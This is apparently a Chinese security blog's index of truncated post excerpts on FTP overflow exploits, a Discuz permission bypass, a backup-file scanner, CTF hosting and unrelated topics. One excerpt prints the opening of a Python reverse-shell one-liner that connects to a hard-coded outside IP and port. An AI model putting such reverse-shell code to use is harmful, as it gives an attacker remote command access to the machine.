继XX同学上个学期对PCMAN FTP这个软件进行了残暴的溢出测试（溢出点是FTP用户名，版本不清楚），我也开始学习逆向和溢出，谷歌上搜索pcman's ftp，找到了这个溢出exploit：http:/...

    最近在写一款基于C#的网站备份文件扫描器，第一次写C#程序，其中遇到各种问题。在这里荟萃一下，给其他朋友一些帮助。     先秀一下效果：    &n...

    实话说，以后不想再挖web漏洞了，也不想发这类文章，web的东西搞来搞起就是那个样，我原本就不想深入，想那些大神一样能把一个cms分析得透彻。我有时候只是泛泛地看，泛泛地找一...

    最近关注的一个discuz平衡权限漏洞，可以绕过附件下载权限达到免费下载附件的目的。于是，自己用C#开发了一个小程序，给大家编译好的exe文件供参考。     0x01 原理...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

在freebuf上莫名地被喷，可能是因为被喷让人气上来了，最后得到的金币比前一篇文章更多。塞翁失马，焉知非福？ 尽管现在呼吁所有的程序都使用unicode编码，所有的网站都使用utf-8编码，来一个统...

啦啦啦，去了北京参加荣耀6的发布会，真心不错呀这款手机，在这里无耻地推荐一下。与会的同学都获得了一枚荣耀6，说说我的感受吧：CPU真心给力，跑分很高；价格合理，2000是荣耀一贯的高性价比...

    众所周知，虚拟主机的安全不好做，特别是防止跨站成为了重点。apache+php服务器防止跨站的方式比较简单，网上的所有成熟虚拟主机解决方案都是基于apache的，如directadmin、cpane...

首先我代表我们XDCTF主办方对大家说声辛苦了，十一假期本该休息却依旧奋斗在CTF第一线。我是XDCTF2014的出题人之一，也是服务器的维护者之一，关于比赛不想说太多，有太多不可控制的因素。包括...

最近一直没什么好文章，只有闲下来挖了几个洞。一般挖洞的时候就没法发文章，因为自己提交上去的洞在公开前是不能泄露的。不过这个洞与乌云某大牛的洞重复了，于是我就发出来一起学习一下。不过...